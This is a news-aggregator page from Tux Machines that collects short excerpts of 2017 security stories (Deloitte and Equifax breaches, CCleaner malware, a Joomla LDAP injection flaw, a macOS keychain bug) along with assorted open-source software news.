Language Selection

English French German Italian Portuguese Spanish

Security

Security: Deloitte, Ransomware, Equifax, Denmark, and macOS 0-Day

Filed under
Security
  • Deloitte hack exposes secret emails and plans from firm's blue-chip clients

    Hackers [sic] are said to have accessed confidential emails and plans of Deloitte's blue-chip clients, along with usernames, passwords, IP addresses, architectural diagrams for businesses and health information.

  • Deloitte hit by cyber-attack revealing clients’ secret emails

    Deloitte, which is registered in London and has its global headquarters in New York, was the victim of a cybersecurity attack that went unnoticed for months.

  • A quarter of local UK councils have fallen victim to ransomware

    115 councils (27 per cent) said they had been victims of security ransoms, while 43 per cent said they hadn't.

  • Equifax CEO Richard Smith Retires as Breach Fallout Continues

    Equifax's massive data breach has claimed another victim - Richard Smith, the company's CEO and Chairman of the Board. Equifax announced that Smith is retiring from his role at the company, effective Sept. 26.

    "The cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right," Smith stated. "At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward."

    Equifax announced on Sept. 7 that it was the victim of a data breach the exposed personally identifiable information on 143 million Americans. The company initially reported that it first became aware of the breach on July 29, though subsequent reports have alleged that the company was breached as early as March.

  • Denmark continues its work on cyber security plan

    Denmark’s Ministry of Finance is to finalise Denmark’s national strategy for cyber and information security. The ministry recently took over coordination of the plans, which previously were being prepared by the Ministry of Defence. The strategy is to be presented early next year, reports Denmark’s Agency for Digitisation (Digitaliseringsstyrelsen - DIGST).

  • Password-theft 0-day imperils users of High Sierra and earlier macOS versions

    There's a vulnerability in High Sierra and earlier versions of macOS that allows rogue applications to steal plaintext passwords stored in the Mac keychain, a security researcher said Monday. That's the same day the widely anticipated update was released.

    The Mac keychain is a digital vault of sorts that stores passwords and cryptographic keys. Apple engineers have designed it so that installed applications can't access its contents without the user entering a master password. A weakness in the keychain, however, allows rogue apps to steal every plaintext password it stores with no password required. Patrick Wardle, a former National Security Agency hacker who now works for security firm Synack, posted a video demonstration here.

Security: Updates, CCleaner, and Capsule8

Filed under
Security
  • Security updates for Monday
  • CCleaner malware may be from Chinese group: Avast

    Security company Avast says it has found similarities between the code injected into CCleaner and the APT17/Aurora malware created by a Chinese advanced persistent threat group in 2014/2015.

  • Capsule8 Raises New Funds to Help Improve Container Security

    Container security startup Capsule8 is moving forward with beta customer deployments and a Series A round of funding, to help achieve its vision of providing a secure, production-grade approach to container security.

    The Series A round of funding was announced on Sept. 19, with the company raising $6 million, led by Bessemer and ClearSky, bringing total funding to date up to $8.5 million. Capsule8 first emerged from stealth in February 2017, though its' core technology product still remains in private beta as the company fine-tunes the platform for production workload requirements.

Security: Adobe and Apple Fail/Fare Badly

Filed under
Security
  • In spectacular fail, Adobe security team posts private PGP key on blog

    Having some transparency about security problems with software is great, but Adobe's Product Security Incident Response Team (PSIRT) took that transparency a little too far today when a member of the team posted the PGP keys for PSIRT's e-mail account—both the public and the private keys. The keys have since been taken down, and a new public key has been posted in its stead.

  • Hackers Using iCloud's Find My iPhone Feature to Remotely Lock Macs and Demand Ransom Payments

    Over the last day or two, several Mac users appear to have been locked out of their machines after hackers signed into their iCloud accounts and initiated a remote lock using Find My iPhone. 

    With access to an iCloud user's username and password, Find My iPhone on iCloud.com can be used to "lock" a Mac with a passcode even with two-factor authentication turned on, and that's what's going on here.

Security: DHS on Potential Voting Machines Cracking, Joomla Patches Critical Flaw

Filed under
Security
  • DHS tells 21 states they were Russia hacking targets before 2016 election
  • 1. WikiLeaks, Russian edition: how it’s being viewed

    Russia has been investing heavily in a vision of cyberdemocracy that will link the public directly with government officials to increase official responsiveness. But it is also enforcing some of the toughest cybersecurity laws to empower law enforcement access to communications and ban technologies that could be used to evade surveillance. Could WikiLeaks put a check on Russia’s cyber regime? This week, the online activist group released the first of a promised series of document dumps on the nature and workings of Russia’s surveillance state. So far, the data has offered no bombshells. “It’s mostly technical stuff. It doesn’t contain any state contracts, or even a single mention of the FSB [security service], but there is some data here that’s worth publishing,” says Andrei Soldatov, coauthor of “The Red Web,” a history of the Soviet and Russian internet. But, he adds, “Anything that gets people talking about Russia's capabilities and actions in this area should be seen as a positive development.”

  • Joomla patches eight-year-old critical CMS bug

    Joomla has patched a critical bug which could be used to steal account information and fully compromise website domains.

    This week, the content management system (CMS) provider issued a security advisory detailing the flaw, which is found in the LDAP authentication plugin.

    Lightweight Directory Access Protocol (LDAP) is used by Joomla to access directories over TCP/IP. The plugin is integrated with the CMS.

    Joomla considers the bug a "medium" severity issue, but according to researchers from RIPS Technologies, the problem is closer to a critical status.

  • Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection

    With over 84 million downloads, Joomla! is one of the most popular content management systems in the World Wide Web. It powers about 3.3% of all websites’ content and articles. Our code analysis solution RIPS detected a previously unknown LDAP injection vulnerability in the login controller. This one vulnerability could allow remote attackers to leak the super user password with blind injection techniques and to fully take over any Joomla! <= 3.7.5 installation within seconds that uses LDAP for authentication. Joomla! has fixed the vulnerability in the latest version 3.8.

Security: FOSS Updates, SEC, CCleaner

Filed under
Security
  • Security updates for Friday
  • SEC Chairman reveals financial reporting system was hacked
  • CCleaner malware outbreak is much worse than it first appeared
  • CCleaner Hack May Have Been A State-Sponsored Attack On 18 Major Tech Companies

    At the beginning of this week, reports emerged that Avast, owner of the popular CCleaner software, had been hacked. Initial investigations by security researchers at Cisco Talos discovered that the intruder not only compromised Avast's servers, but managed to embed both a backdoor and "a multi-stage malware payload" that rode on top of the installation of CCleaner. That infected software -- traditionally designed to help scrub PCs of cookies and other tracking software and malware -- was subsequently distributed by Avast to 700,000 customers (initially, that number was thought to be 2.27 million).

    And while that's all notably terrible, it appears initial reports dramatically under-stated both the scope and the damage done by the hack. Initially, news reports and statements by Avast insisted that the hackers weren't able to "do any harm" because the second, multi-stage malware payload was never effectively delivered. But subsequent reports by both Avast and Cisco Talos researchers indicate this payload was effectively delivered -- with the express goal of gaining access to the servers and networks of at least 18 technology giants, including Intel, Google, Microsoft, Akamai, Samsung, Sony, VMware, HTC, Linksys, D-Link and Cisco itself.

IoT botnet Linux.ProxyM turns its grubby claws to spam rather than DDoS

Filed under
Security

An IoT botnet is making a nuisance of itself online after becoming a conduit for spam distribution.

Linux.ProxyM has the capability to engage in email spam campaigns with marked difference to other IoT botnets, such as Mirai, that infamously offered a potent platform for running distributed-denial-of-service attacks (DDoSing). Other IoT botnets have been used as proxies to offer online anonymity.

Read more

Security: Antipatterns in IoT Security, Signing Programs for Linux, and Guide to Two-Factor Authentication

Filed under
Security
  • Antipatterns in IoT security

    Security for Internet of Things (IoT) devices is something of a hot topic over the last year or more. Marti Bolivar presented an overview of some of the antipatterns that are leading to the lack of security for these devices at a session at the 2017 Open Source Summit North America in Los Angeles. He also had some specific recommendations for IoT developers on how to think about these problems and where to turn for help in making security a part of the normal development process.

    A big portion of the talk was about antipatterns that he has seen—and even fallen prey to—in security engineering, he said. It was intended to help engineers develop more secure products on a schedule. It was not meant to be a detailed look at security technologies like cryptography, nor even a guide to what technical solutions to use. Instead, it targeted how to think about security with regard to developing IoT products.

  • Signing programs for Linux

    At his 2017 Open Source Summit North America talk, Matthew Garrett looked at the state of cryptographic signing and verification of programs for Linux. Allowing policies that would restrict Linux from executing programs that are not signed would provide a measure of security for those systems, but there is work to be done to get there. Garrett started by talking about "binaries", but programs come in other forms (e.g. scripts) so any solution must look beyond simply binary executables.

    There are a few different reasons to sign programs. The first is to provide an indication of the provenance of a program; whoever controls the key actually did sign it at some point. So if something is signed by a Debian or Red Hat key, it is strong evidence that it came from those organizations (assuming the keys have been securely handled). A signed program might be given different privileges based on the trust you place in a particular organization, as well.

  • A Guide to Common Types of Two-Factor Authentication on the Web

    Two-factor authentication (or 2FA) is one of the biggest-bang-for-your-buck ways to improve the security of your online accounts. Luckily, it's becoming much more common across the web. With often just a few clicks in a given account's settings, 2FA adds an extra layer of security to your online accounts on top of your password.

    In addition to requesting something you know to log in (in this case, your password), an account protected with 2FA will also request information from something you have (usually your phone or a special USB security key). Once you put in your password, you'll grab a code from a text or app on your phone or plug in your security key before you are allowed to log in. Some platforms call 2FA different things—Multi-Factor Authentication (MFA), Two Step Verification (2SV), or Login Approvals—but no matter the name, the idea is the same: Even if someone gets your password, they won't be able to access your accounts unless they also have your phone or security key.

    There are four main types of 2FA in common use by consumer websites, and it's useful to know the differences. Some sites offer only one option; other sites offer a few different options. We recommend checking twofactorauth.org to find out which sites support 2FA and how, and turning on 2FA for as many of your online accounts as possible. For more visual learners, this infographic from Access Now offers additional information.

    Finally, the extra layer of protection from 2FA doesn't mean you should use a weak password. Always make unique, strong passwords for each of your accounts, and then put 2FA on top of those for even better log-in security.

Security: SEC Breach, DNSSEC, FinFisher, CCleaner and CIA

Filed under
Security

Security: Apple's Betrayal, Intel ME Back Doors Backfire, and Optionsbleed

Filed under
Security
  • iOS 11 Muddies WiFi and Bluetooth Controls

    Turning WiFi and Bluetooth off is often viewed as a good security practice. Apple did not rationalize these changes in behavior.

  • How To Hack A Turned-Off Computer, Or Running Unsigned Code In Intel Management Engine

    Intel Management Engine is a proprietary technology that consists of a microcontroller integrated into the Platform Controller Hub (PCH) microchip with a set of built-in peripherals. The PCH carries almost all communication between the processor and external devices; therefore Intel ME has access to almost all data on the computer, and the ability to execute third-party code allows compromising the platform completely. Researchers have been long interested in such "God mode" capabilities, but recently we have seen a surge of interest in Intel ME. One of the reasons is the transition of this subsystem to a new hardware (x86) and software (modified MINIX as an operating system) architecture. The x86 platform allows researchers to bring to bear all the power of binary code analysis tools.

  • Optionsbleed: Don’t get your panties in a wad

    To be honest, this isn’t the first security concern you’ve run in to, and it isn’t the first security issue you’re vulnerable to, that will remain exploitable for quite some time, until after someone you rely on fixed the issue for you, meanwhile compromising your customers.

    [...]

    Is it a small part of the SSL public key? A small part of the web request response? A chunk of the path to the index.php? Or is it a chunk of the database password used? Nobody knows until you get enough data to analyse the results of all data. If you can’t appreciate the maths behind analysing multiple readings of 8 arbitrary bytes, choose another career. Not that I know what to do and how to do it, by the way.

Security: Patches, CCleaner, Equifax Story Changes, 'Trusted IoT Alliance', Kali Linux 2017.2 and NBN

Filed under
Security
Syndicate content

More in Tux Machines

Ubuntu Budgie 18.04 Beta 2, Replacement for gksu

  • The Unique Ubuntu Budgie 18.04 Beta 2
    It is the most unique among the Official Flavors in the 18.04. It's the only to bring Chromium browser, and it gives you the unique Budgie Desktop experiences. It is really a good place for everyone who wants new, distinct desktop experience with modern version of software and broad space to explore. And ultimately it is still available for 32 bit, which has been abandoned by Ubuntu original. We will wait until the planned release on April 26.
  • Welcome To The (Ubuntu) Bionic Age: Behind communitheme: interviewing Frederik
    My name is Frederik, I live in Germany and I am working as a java software developer in my daily job. I am using Ubuntu since 5 years and quickly started to report bugs and issues when they jumped into my face. Apart from that, I like good music, and beautiful software. I also make my own music in my free time.
  • gksu Removed From Ubuntu, Here's The Recommended Replacement
    gksu is used to allow elevating your permissions when running graphical applications, for example in case you want to run a graphical text editor as root to edit a system file, or to be able to remove or add a file to a system folder.
  •  

Devices: Aaeon, Tizen and Android

OSS Leftovers

  • Open source crucial to Orange as it prepares for ONAP deployment
    Orange has long played a key part in the testing and adoption of ONAP, dating back to when its ECOMP predecessor was created by AT&T as a platform for managing a software-defined network. The move to open source and its development as the ONAP project has made the platform a key component of the new telco open networking movement. But why should other telcos look to ONAP as they embark on their network transformation strategies, and how does it help enable the automated network that will lead to new business opportunities?
  • Lessons from OpenStack Telemetry: Deflation
    At some point, the rules relaxed on new projects addition with the Big Tent initiative, allowing us to rename ourselves to the OpenStack Telemetry team and splitting Ceilometer into several subprojects: Aodh (alarm evaluation functionality) and Panko (events storage). Gnocchi was able to join the OpenStack Telemetry party for its first anniversary.
  • Dev-tools in 2018
    This is a bit late (how is it the middle of April already?!), but the dev-tools team has lots of exciting plans for 2018 and I want to talk about them! [...] We're creating two new teams - Rustdoc, and IDEs and editors - and going to work more closely with the Cargo team. We're also spinning up a bunch of working groups. These are more focused, less formal teams, they are dedicated to a single tool or task, rather than to strategy and decision making. Primarily they are a way to let people working on a tool work more effectively. The dev-tools team will continue to coordinate work and keep track of the big picture.
  • Nonny de la Peña & the Power of Immersive Storytelling
    This week, we’re highlighting VR’s groundbreaking potential to take audiences inside stories with a four part video series. There aren’t many examples of creators doing that more effectively and powerfully than Nonny de la Peña. Nonny de la Peña is a former correspondent for Newsweek, the New York Times and other major outlets. For more than a decade now, de la Peña has been focused on merging her passion for documentary filmmaking with a deep-seeded expertise in VR. She essentially invented the field of “immersive journalism” through her company, Emblematic Group.
  • Collabora Online 3.2 Brings More Powerful Features to LibreOffice in the Cloud
    Michael Meeks of the Collabora Productivity has the pleasure of informing Softpedia today on the availability of Collabora Online 3.2, the second point release of the Collabora Online 3 series that promises yet another layer of new features and improvements to the enterprise-ready, cloud-based office suite. Based on the LibreOffice 6.1 open-source office suite, Collabora Online 3.2 introduces support for creating and inserting charts into Writer and Impress documents, and the ability to validate data in Calc, which might come in handy for engineers who want to do a final assembly inspection on their tablets, as well as to collaborate with their colleagues to ensure all tests are passed by a complete product.
  • Oracle demands dev tear down iOS app that has 'JavaScript' in its name
    Oracle, claims developer Zhongmin Steven Guo, has demanded that Apple remove an app he created because it contains the trademarked term "JavaScript." The app in question, published by Guo's Tyanya Software LLC – which appears to be more a liability shield than a thriving software business – is titled "HTML5, CSS, JavaScript, HTML, Snippet Editor." The name, Guo explains in a Hacker News comment, was chosen in an effort to "game the App Store ranking by adding all the keywords to the app name."
  • FoundationDB is Open Source
    Starting today, FoundationDB starts its next chapter as an open source project! FoundationDB is a distributed datastore, designed from the ground up to be deployed on clusters of commodity hardware. These clusters scale well as you add machines, automatically heal from hardware failures, and have a simple API. The key-value store supports fully global, cross-row ACID transactions. That's the highest level of data consistency possible. What does this mean for you? Strong consistency makes your application code simpler, your data models more efficient, and your failure modes less surprising. The great thing is that FoundationDB is already well-established — it's actively developed and has years of production use. We intend to drive FoundationDB forward as a community project and we welcome your participation.
  • Apple Open Sources FoundationDB, Releases Code On GitHub
    Back in 2015, Apple bought FoundationDB, a NoSQL database company. It created a distributed database of the same name designed to deal with large masses of structured data across clusters of servers. In a recent development, Apple has shared the FoundationDB core and turned it into an open source project.
  • Microsoft offers limited-time 30 percent discount on SQL Server on Linux [Ed: Microsoft is googlebombing Linux again and as I predicted it would be done only to help Microsoft sell malicious proprietary software. Mary Jo Foley is like Microsoft marketing at CBS. In this case she promotes proprietary software. She also says "SQL Server on Linux" (no such thing exists, it's an illusion).]
  • Friday Free Software Directory IRC meetup time: April 20th starting at 12:00 p.m. EDT/16:00 UTC
    Help improve the Free Software Directory by adding new entries and updating existing ones. Every Friday we meet on IRC in the #fsf channel on irc.freenode.org. Tens of thousands of people visit directory.fsf.org each month to discover free software. Each entry in the Directory contains a wealth of useful information, from basic category and descriptions, to providing detailed info about version control, IRC channels, documentation, and licensing info that has been carefully checked by FSF staff and trained volunteers.
  • Researchers deliver open-source simulator for cyber physical systems
    Cyber physical systems (CPS) are attracting more attention than ever thanks to the rapid development of the Internet of Things (IoT) and its combination with artificial intelligence (AI), machine learning and the cloud. These interacting networks of physical and computational components will provide the foundation of critical infrastructure, form the basis of ‘smart’ services, and improve the quality of life in areas ranging from energy and environment to transportation and healthcare. CPS technologies are already transforming the way people interact with engineered systems in the ‘real’ or ‘physical’ world, just as the internet has transformed the way people interact with information. Yet, due to their complexity, the developers of CPS face a major problem: the lack of simulation tools and models for their design and analysis.
  • Creators face an evolving challenge protecting IP
    The GNU General Public License, under which the operating system Linux and much open-source software is shared, is another example of copyleft. Open-source software, where programs are worked on together by loosely connected developer communities rather than traditional software houses, show one way IP can be shared without stifling innovation. Linux, the mobile operating system Android and the database system MySQL have all achieved widespread adoption, and are continually innovating despite, or perhaps because of, being open source.
  • Emerging Tech Speaker Series Talk with Rian Wanstreet
    This is an opportunity for the open source community, as alternative technologies and platforms are being developed which provide farmers the ability to farm outside of walled gardens. From open source seed initiatives, to open farm technologies, to data platform cooperatives, there is a small, but growing, collaborative movement that recognizes that farmers are at a critical moment: they can help to establish tools that advance freedom, or accept machines that foster dependencies.
  • Williamson Schools to develop open source social studies curriculum
    The open source science curriculum saved the district about $3.3 million. An open source social studies curriculum may post similar savings, with estimates at about $3.5-4 million, Gaddis said.
  • Large Open-Source Data Set Released to Help Train Algorithms Spot Malware
    For the first time, a large dataset has been released by a security firm to help AI research and training of machine learning models that statically detect malware. The data set released by cybersecurity firm Endgame is called EMBER is a collection of more than a million representations of benign and malicious Windows-portable executable files. Hyrum Anderson, Endgame's technical director of data science who worked on EMBER, says: "This dataset fills a void in the information security machine learning community: a benign/malicious dataset that is large, open and general enough to cover several interesting use cases. ... [We] hope that the dataset, code and baseline model provided by EMBER will help invigorate machine learning research for malware detection, in much the same way that benchmark datasets have advanced computer vision research."

Android Leftovers